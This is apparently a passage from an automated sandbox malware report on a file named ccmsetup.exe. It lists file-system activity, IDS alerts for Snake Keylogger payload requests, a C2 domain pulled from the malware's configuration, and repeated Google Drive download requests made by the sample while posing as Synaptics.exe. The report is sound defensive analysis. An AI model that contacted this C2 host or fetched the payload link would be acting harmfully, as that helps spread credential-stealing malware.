                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeCode function: 2_2_00589401 __EH_prolog3_catch_GS,GetCurrentThreadId,GetCurrentThreadId,GetCurrentThreadId,FindFirstFileW,FindNextFileW,FindClose,2_2_00589401
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeCode function: 2_2_0060581F __EH_prolog3_catch_GS,GetCurrentThreadId,GetCurrentThreadId,GetCurrentThreadId,GetCurrentThreadId,GetCurrentThreadId,FindFirstFileW,GetLastError,GetCurrentThreadId,GetCurrentThreadId,GetCurrentThreadId,CopyFileW,GetLastError,GetCurrentThreadId,FindNextFileW,FindClose,2_2_0060581F
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeCode function: 2_2_00587953 __EH_prolog3_catch_GS,GetCurrentThreadId,FindFirstFileW,FindNextFileW,FindClose,GetCurrentThreadId,2_2_00587953
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeCode function: 2_2_0057DD9A __EH_prolog3_catch_GS,FindFirstFileW,FindNextFileW,FindClose,RemoveDirectoryW,GetLastError,DeleteFileW,GetLastError,GetCurrentThreadId,FindClose,2_2_0057DD9A
                              Source: C:\Users\user\Desktop\ccmsetup.exeFile opened: C:\Users\userJump to behavior
                              Source: C:\Users\user\Desktop\ccmsetup.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                              Source: C:\Users\user\Desktop\ccmsetup.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                              Source: C:\Users\user\Desktop\ccmsetup.exeFile opened: C:\Users\user\AppDataJump to behavior
                              Source: C:\Users\user\Desktop\ccmsetup.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\ccmsetup.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior

                              Networking

                              barindex
                              Suricata IDS alerts for network traffic
                              Source: Network trafficSuricata IDS: 2832617 - Severity 1 - ETPRO MALWARE W32.Bloat-A Checkin : 192.168.2.5:49712 -> 69.42.215.252:80
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49729 -> 172.217.19.238:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49721 -> 172.217.19.238:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49720 -> 172.217.19.238:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49746 -> 172.217.19.238:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49708 -> 172.217.19.238:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49756 -> 172.217.19.238:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49757 -> 172.217.19.238:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49772 -> 172.217.19.238:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49804 -> 172.217.19.238:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49802 -> 172.217.19.238:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49824 -> 172.217.19.238:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49864 -> 172.217.19.238:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49794 -> 172.217.19.238:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49825 -> 172.217.19.238:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49747 -> 172.217.19.238:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49894 -> 172.217.19.238:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49863 -> 172.217.19.238:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49844 -> 172.217.19.238:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49882 -> 172.217.19.238:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49892 -> 172.217.19.238:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49911 -> 172.217.19.238:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49845 -> 172.217.19.238:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49707 -> 172.217.19.238:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49883 -> 172.217.19.238:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49793 -> 172.217.19.238:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49910 -> 172.217.19.238:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49728 -> 172.217.19.238:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49771 -> 172.217.19.238:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.5:49920 -> 172.217.19.238:443
                              C2 URLs / IPs found in malware configuration
                              Source: Malware configuration extractorURLs: xred.mooo.com
                              Uses dynamic DNS services
                              Source: unknownDNS query: name: freedns.afraid.org
                              Source: Joe Sandbox ViewIP Address: 13.107.246.63 13.107.246.63
                              Source: Joe Sandbox ViewIP Address: 69.42.215.252 69.42.215.252
                              Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
                              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49965 -> 13.107.246.63:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49996 -> 13.107.246.63:443
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=E2qOWQ5noWW8F60Fg6vQtwgyW2VEX3a759KV8GuVUalHhGuNG5nJt2mnliW_EIEctlonUtOkJ7269YI9zD81WZ2mWzRY3WQG982h6ijztVxt3jQYqg6EB0VChzrAFfkPH7PWdINLriHvYxY4IPw5kkYg4ofOUAdWixKZp50v_wqF6635qxanN2k
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=E2qOWQ5noWW8F60Fg6vQtwgyW2VEX3a759KV8GuVUalHhGuNG5nJt2mnliW_EIEctlonUtOkJ7269YI9zD81WZ2mWzRY3WQG982h6ijztVxt3jQYqg6EB0VChzrAFfkPH7PWdINLriHvYxY4IPw5kkYg4ofOUAdWixKZp50v_wqF6635qxanN2k
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=E2qOWQ5noWW8F60Fg6vQtwgyW2VEX3a759KV8GuVUalHhGuNG5nJt2mnliW_EIEctlonUtOkJ7269YI9zD81WZ2mWzRY3WQG982h6ijztVxt3jQYqg6EB0VChzrAFfkPH7PWdINLriHvYxY4IPw5kkYg4ofOUAdWixKZp50v_wqF6635qxanN2k
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=E2qOWQ5noWW8F60Fg6vQtwgyW2VEX3a759KV8GuVUalHhGuNG5nJt2mnliW_EIEctlonUtOkJ7269YI9zD81WZ2mWzRY3WQG982h6ijztVxt3jQYqg6EB0VChzrAFfkPH7PWdINLriHvYxY4IPw5kkYg4ofOUAdWixKZp50v_wqF6635qxanN2k
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
